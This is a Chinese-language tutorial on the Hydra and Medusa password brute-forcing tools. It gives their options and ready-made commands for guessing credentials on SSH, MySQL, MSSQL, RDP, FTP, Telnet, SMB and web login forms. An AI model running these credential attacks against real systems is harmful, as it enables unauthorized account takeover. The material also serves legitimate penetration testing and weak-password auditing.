本文內容:
- hydra簡介
- hydra安裝配置
- hrdra破解
- Medusa
1,hydra簡介:
hydra的中文意思是就透徹,它是一款爆破神器,可以對多種服務的賬號和密碼進行爆破,包括Web登錄、數據庫、SSH、Ftp等服務。
支持Linux、Windows、Mac平台安裝,其中Kali Linux中自帶hydra。
Hydra支持的服務有:POP3、SMB、RDP,SSH,FTP,POP3,Telnet,MYSQL……
最大的安全漏洞之一是弱口令。
2,hydra安裝配置:
Kali Linux中hydra自帶。
Kali是安全從業人員常用的Linux系統,自帶有大量安全工具,hydra自然也繼承在里面。
工具位置:密碼攻擊--在線攻擊一欄
開源項目:https://github.com/vanhauser-thc/thc-hydra
Windows中hydra安裝:
hydra官方不支持Windows,需要在Github上下載,地址:https://github.com/maaaaz/thc-hydra-windows 下載解壓即可。
3,hydra破解:
1.hydra相關參數:
-l LOGIN 指定破解的用戶名成,對特定用戶破解
-L FILE 從文件中加載用戶名進行破解。
-p PASS 小寫p執行密碼破解,少用,一般是采用密碼字典。
-P FILE 大寫字母P,指定密碼字典。
-e ns 可選選項,n:空密碼試探,s:使用指定用戶和密碼[相同]試探。
-C FILE 使用冒號分隔格式,例如"登錄:密碼"來代替-L/-P參數。
-t TASKS 同時運行的鏈接的線程數,每一台主機默認為16
-M FILE 指定服務器目標列表文件一行一條。
-w TIME 設置最大超時的時間,單位秒,默認是30s。
-O FILE 指定結果輸出文件。
-f 在使用-M參數以后,找到第一對登錄名或者密碼的時候終止破解。
-v/-V 顯示詳細過程。
-R 繼續從上一次進度接着破解。
-S 采用SSL鏈接。
-s PORT 可通過這個參數指定非默認端口。
-U 服務模塊使用細節
-h 更多的命令行選項[完成的幫助]
server 目標服務器名稱或者IP[使用這個或-M選項]
service 指定服務名,支持的服務核協議telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等
OPT 一些服務模塊支持額外的輸入[-U用於模塊的幫助]
例如:[用法]:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
2.hydra用法案例:
圖形化界面:xhydra[推薦還是命令直接搞]
案例1:
破解Mysql密碼
數據庫一般會提供一個默認的賬戶,sql server的sa與用戶,Mysql的root用戶,Oracle的System用戶等。
假如我們現在破解Mysql數據庫:
hydra -L user.txt -P pass.txt ip mysql
hydra -L user.txt -P pass.txt mysql://目標ip:mysql端口號
如果需要將爆破的過程打印出來就加個指令-v
hydra -L username.txt -P password.txt -v
mysql://目標ip:mysql端口號
成功后會打印類似如下的信息:
[3306][mysql] host:ip login:sa password:sqladmin
案例2:
破解SSH:
hydra -l 用戶名 -P 密碼字典 -t 線程 -v/V -e ns -f ip ssh
hydra -l root -P /root/桌面/1.txt -t 6 -V -e ns -f 192.168.62.129 ssh
hydra -l 用戶名 -P 密碼字典 -t 線程 -o save.log -vV -f ip ssh
命令詳細:
攻擊目標:192.168.62.128
使用的模塊:ssh
爆破用戶名:root (-1)
使用的密碼字典:/root/passwd.txt (-P)
爆破線程數:6 (-t)
顯示詳細信息 (-V)
爆破成功一個后提示(-f)
其他案例:
1.Windows密碼破解:
hydra -l 用戶名 -p 密碼 smb://ip -vV<br>或者<br>hydra -l 用戶名 -p 密碼 smb ip –vV
2.破解Ftp:
hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程數(默認16) –vV
如果你發現目標ftp並不是在21端口,而是在其他端口上,可以使用-s參數指定正確的端口,其他服務同樣如此
3.破解rdp:
hydra ip rdp -l administrator -P pass.txt –V
4.破解telnet:
hydra ip telnet -l 用戶 -P 密碼字典 -t 32 -s 23 -e ns -f –V
5.破解HTTPS:
hydra -m /index.php -l muts -P pass.txt ip https
6.Get方式提交,破解Web登錄[不推薦,太過雞肋]:
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /web/
7.Post方式提交,破解Web登錄[不鬼劍,太過雞肋]:
hydra -l 用戶名 -P 密碼字典 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" -V
3.hydra的缺點:
1.穩定性差,程序時常崩潰。
2.速度控制不好,容易觸發服務器屏蔽或鎖死機制。
3.每主機新建進程,沒服務新建實例。
4.大量目標破解時性能差。
4,美杜莎-Medusa:
1.Medusa的特點:
1.穩定性好。
2.速度控制得當。
3.基於線程。
4.支持模塊少於hydra[不支持rdp遠程桌面]
5.Web-Form支持存在缺陷
2.Medusa參數:
-h [TEXT] 目標IP
-H [FILE] 目標主機文件
-u [TEXT] 用戶名
-U [FILE] 用戶名文件
-p [TEXT] 密碼
-P [FILE] 密碼文件
-C [FILE] 組合條目文件
-O [FILE] 文件日志信息[保存掃描結果]
-e [n/s/nsN意為空密碼,S意為密碼與用戶名相同
-M [TEXT] 模塊執行名稱
-m [TEXT] 傳遞參數到模塊
-d 顯示所有的模塊名稱
-n [NUM] 使用非默認端口
-s 啟用SSL
-r [NUM] 重試間隔時間,默認為3秒
-t [NUM] 設定線程數量
-L 並行化,每個用戶使用一個線程
-f 在任何主機上找到第一個賬號/密碼后,停止破解
-q 顯示模塊的使用信息
-v [NUM] 詳細級別(0-6)
-w [NUM] 錯誤調試級別(0-10)
-V 顯示版本
-Z [TEXT] 繼續掃描上一次
3.Medusa使用:
1.使用語法:
medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
2.破解MSSQL:
medusa -h ip -u root -P /pass.txt -t 5 -f -M mssql
3.破解ssh:
medusa -M ssh -H host.txt -U user.txt -p password
4.輸出日志文件:
medusa -h ip -u sa -P /pass.txt -t 5 -f -e ns -M mssql -O /ap.txt